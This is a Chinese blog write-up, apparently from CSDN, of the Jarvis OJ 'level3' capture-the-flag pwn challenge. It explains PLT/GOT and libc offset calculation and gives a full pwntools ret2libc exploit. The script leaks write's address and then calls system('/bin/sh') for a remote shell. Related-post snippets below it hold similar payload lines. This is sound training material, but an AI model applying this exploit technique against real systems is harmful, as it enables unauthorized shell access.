Jarvis oj level3

最新推荐文章于 2023-08-20 20:27:09 发布
原创 最新推荐文章于 2023-08-20 20:27:09 发布 · 1.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了如何通过write函数泄露服务器地址,利用plt和got表构造payload,最终实现对Level3的攻击。文章介绍了Linux下ANSIC函数库的利用技巧,通过计算函数地址偏移,定位/bin/sh和system函数,最终获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢?

首先了解plt和got表。链接
在这里插入图片描述我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放的是函数在内存中的真实地址,也就是说plt[write]指向got[write],got[write]指向write函数在内存中的地址。而plt表在服务器和客户机是一样的,不一样的是函数在内存中的地址。程序运行后加载动态库,把动态库中的相应函数地址填入GOT表。同时还有个知识点,libc文件中不同函数、数据之间的偏移量在服务器和客户机中是一样的。

因此思想是首先利用write函数将服务器中函数的地址泄露,构造write(got[write])。

pad
ebp
ret_addr
write的参数1,从右到左
write的参数2
write的参数3

得到服务器中write函数的真实地址。
由于函数在内存中距so文件开头地址是一样的,因此算出offset=服务器函数地址-本地地址,服务器地址即为本地地址+offset。

脚本:

from pwn import *
conn=remote("pwn2.jarvisoj.com","9879")
e=ELF("level3")
libc=ELF("libc-2.19.so")
write_addr=e.symbols['write']
vul_addr=e.symbols['vulnerable_function']
got_addr=e.got['write']

conn.recvuntil("Input:\n")
payload1="a"*0x88+"bbbb"+p32(write_addr)+p32(vul_addr)+p32(1)+p32(got_addr)+p32(4)
conn.send(payload1)
temp = conn.recv(4)
true_address = u32(temp[0:4])
print hex(true_address)

offset=true_address-libc.symbols['write']

bin_addr=libc.search("/bin/sh").next()+offset
sys_addr=libc.symbols['system']+offset

payload2="a"*0x88+"bbbb"+p32(sys_addr)+"junk"+p32(bin_addr)
conn.send(payload2)
conn.interactive()

注意点:
我在p32里运算有问题,拉出来就可以了。

加一种,如果不知道libc版本,使用LibcSearcher库

obj = LibcSearcher("read", u32(read_got))	//根据read的地址后3字节判断libc版本
offset=u32(read_got)-obj.dump('read') 		//偏移
sys=obj.dump("system")+offset      
bins=obj.dump("str_bin_sh")+offset
Jarvis OJ--level3
Kni9hT's Blog
11-10 298
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ level1
Kni9hT's Blog
11-08 649
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
jarvis oj level3
CNXBDSa的博客
07-27 457
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
jarvisoj level3
sun的博客
10-03 1104
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1504
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
Jarvis Oj Pwn 学习笔记-level3
baoan4763的博客
05-31 205
你们期待的Libc终于来了~(return_to_libc attack) 跪呈链接: https://files.cnblogs.com/files/Magpie/level3.rar nc pwn2.jarvisoj.com 9879 checksec,依旧老样子: 端起IDA,elf和libc双双扔进锅里: 先看elf: 阔以阔以,libc类题目该有的函数(话...
BUUCTF jarvisoj_level2 题解
最新发布
qq_51802916的博客
08-20 605
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 382
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 399
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
Jarvis OJ_level3_入门栈溢出
Jc
07-11 467
附录:发现这个网站的题还是挺系统的,对于入门pwn的是挺好的一个选择 解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP
Jarvis OJ-level3
weixin_30332241的博客
05-15 130
使用ret2libc攻击方法绕过数据执行保护 from pwn import* conn = remote("pwn2.jarvisoj.com",9879) elf = ELF('level3') libc = ELF('libc-2.19.so') plt_write = elf.symbols['write'] #0804834 print 'plt_write =...
jarvisoj_level3
m0_52231248的博客
11-17 706
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1399
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
Jarvis OJ level3 writeup
PLpa的博客
07-07 320
这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。 拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下: 解压出两个文件:level3和libc-2.19.so。 我们查看一下这两个文件的保护: 可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。 我们把level3放到IDA中查看一下程序逻辑:...
Jarvis OJ-PWN-[XMAN]level3 wp
分不清东西南北的Laffey
10-15 764
地址:nc pwn2.jarvisoj.com 9879 一开始拿到题目的时候是一个rar文件 解压后就得到了两个文件 对这两个文件查看保护 两个文件都是32位的 level3没有开启栈保护 可以利用栈溢出;栈中内容不可使用 不用shellcode libc-2.19.so可以看到是全部都开启了 用IDA32打开level3 跟进vulnerable_function()函数 溢出点在r...
jarvis oj level3
weixin_44932880的博客
07-25 322
所需知识 先在终端用file命令查看文件为32位,在对应版本的IDA中打开 用checksec命令查看文件发现 栈无保护,再看伪代码分析可知 可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址 再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag 大致思路跟第二题是一样的, 但是不同点在于上一题可以直接在IDA里面获得函数syste...
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 874
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 515
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
jarvisoj_level0
08-14
- *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值